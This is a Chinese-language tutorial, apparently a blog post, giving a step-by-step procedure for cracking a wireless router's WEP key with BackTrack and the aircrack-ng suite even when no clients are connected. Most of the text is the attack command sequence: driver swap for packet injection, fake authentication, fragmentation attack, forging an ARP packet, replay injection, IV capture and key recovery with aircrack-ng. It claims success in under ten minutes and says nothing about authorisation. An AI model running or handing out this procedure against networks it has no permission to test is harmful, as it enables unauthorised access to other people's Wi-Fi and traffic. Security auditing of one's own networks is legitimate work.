很多无线路由器,把wep加密方式排在了第一位,所以在用户选择加密方式时往往也就选了wep加密。但是wep简直太脆弱了,在没有客户端的情况下,也能很快破解。
环境
无线网卡是Intel 3945ABG,显示为wifi0。不同的无线网卡ifconfig显示的名称不一样。
Backtrack 3.0。BT4.0的版本方法类似。
需要和路由器的距离足够近。
具体步骤
BT3.0下,要是用ipwraw的无线网卡驱动才能支持注入包,而BT4.0下默认的驱动iwl3945(iwlwifi)是不需要的。先来载入ipwraw驱动模块。
modprobe -r ipw3945
modprobe ipwraw
运行start-kismet-ng这个脚本,查看用wep加密的无线路由器。记下其MAC地址、路由器名称(SSID)和信号的频道。为了破解方便,不需要输入一长串MAC地址,把这些信息作为环境变量:
export AP=00:12:34:56:78:90 [路由器的MAC地址]
export WIFI=00:12:34:56:78:90 [你的无线网卡的MAC地址]
export SSID=dlink [路由器的名称SSID]
记得创建一个dlink的文件夹,进入后,逐一运行以下命令。注意这里用的路由器的信号频道是6,需要按照具体的频道现场修改。我的网卡是wifi0,你也需要根据你的修改。
airmon-ng start wifi0 6 [频道6]
aireplay-ng -1 0 -e $SSID -a $AP -h $WIFI wifi0
aireplay-ng -5 -b $AP -h $WIFI wifi0
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w arp-request
airodump-ng -c 6 --bssid $AP --ivs -w cap wifi0 [频道6]
如果以上步骤没有出错的话,你就可以看到收集包的窗口打开,里面的DATA一栏略有变化。接下来,打开另一个命令窗口,进入dlink目录。这个命令可以注入更多的数据包,加快破解进程。
aireplay-ng -2 -r arp-request wifi0
再开启一个命令窗口,进入dlink目录,运行下面两个命令,一边收集ivs,一边破解:
export AP=00:12:34:56:78:90
aircrack-ng -n 64 -b $AP *.ivs
很快就可以看到用 : 分割的密码了,整个过程不超过10分钟。以上只是一个快速破解的过程,具体的解释和细节请参考aircrack-ng的wiki。
本文参考了durdle的博客,向其致敬,我稍作调整并修正了原作者的笔误。
注意事项
如果运行aireplay-ng -5 -b $AP -h $WIFI wifi0出现一下错误,可能是距离路由器太远,信号不够所致。
Saving chosen packet in replay_src-0821-082546.cap
08:25:48 Data packet found!
08:25:48 Sending fragmented packet
08:25:48 Not enough acks, repeating…
